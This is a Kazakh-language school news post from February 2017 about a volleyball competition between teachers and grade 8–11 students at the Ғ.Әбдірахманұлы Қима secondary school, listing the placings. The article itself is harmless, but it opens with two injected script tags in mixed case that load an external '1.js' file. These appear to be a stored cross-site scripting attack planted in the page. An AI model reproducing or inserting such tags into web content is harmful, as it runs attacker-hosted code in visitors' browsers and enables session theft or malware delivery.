<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.02.2017

Ғ.Әбдірахманұлы атындағы Қима орта мектебінің дене тәрбиесі және эстетикалық пәндер әдістемелік бірлестігінде волейболдан жарыс өтті.

Атаулы мектепте 7 ақпан күні мұғалімдер мен 8-11 сынып оқушылары арасында волейболдан жарыс өткізілді.

Бұл жарыстың өтуінің мақсаты: Салауатты өмірге қалыптастыра отырып, дене тәрбиесі сабағына бейімдеу. Жарысқа жас мұғалімдер арасынан 1 команда, 11 сынып ұлдары арасында, 11 сынып қыздары арасында, 9-10 сынып ұлдары арасында құрама команда, 8 сынып оқушыларынан 1 команда қатысты. Ойын барысында оқушылардың қызығыушылығы мол болды. Дене тәрбиесі пәні мұғалімі Құсайын Елжас Айтанұлының ұйымдастыруымен өткізілді.

Командалар өзара жарысып, 1 орын 11 сынып ұлдар командасы, 2 орын жас мұғалімдер командасы, 3 орын 9-10 сынып ұлдар құрама командасы иеленді. Оқушылар қызыға ойнады, өз командаларын жеңіс тұғырына көтеру үшін көптеген жұмыс жасады. Ойын қызықты да, тартысты өтті.

Просмотров: 616


Пікір қосу



Деректерді қолтаңбаға қосу